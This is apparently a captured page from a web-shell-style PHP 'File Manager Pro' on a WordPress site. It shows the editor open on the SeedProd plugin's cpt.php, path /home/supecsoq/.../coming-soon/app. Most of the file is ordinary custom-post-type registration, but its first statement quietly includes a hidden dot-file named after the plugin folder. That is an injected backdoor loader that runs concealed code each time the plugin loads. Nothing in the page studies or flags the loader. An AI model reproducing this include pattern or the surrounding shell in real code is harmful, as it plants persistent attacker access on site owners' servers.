📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 17:25:17
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
coming-soon
/
app
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/coming-soon/app
🔄 Refresh
✏️
Editing: cpt.php
Writable
<?php // Register Custom Post Type if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function seedprod_lite_post_type() { $args = array( 'supports' => array( 'title', 'editor', 'revisions' ), 'public' => false, 'capability_type' => 'page', 'show_ui' => false, 'publicly_queryable' => true, ); register_post_type( 'seedprod', $args ); } $sedprod_pt = post_type_exists( 'seedprod' ); if ( $sedprod_pt === false ) { add_action( 'init', 'seedprod_lite_post_type', 0 ); }
💾 Save Changes
❌ Cancel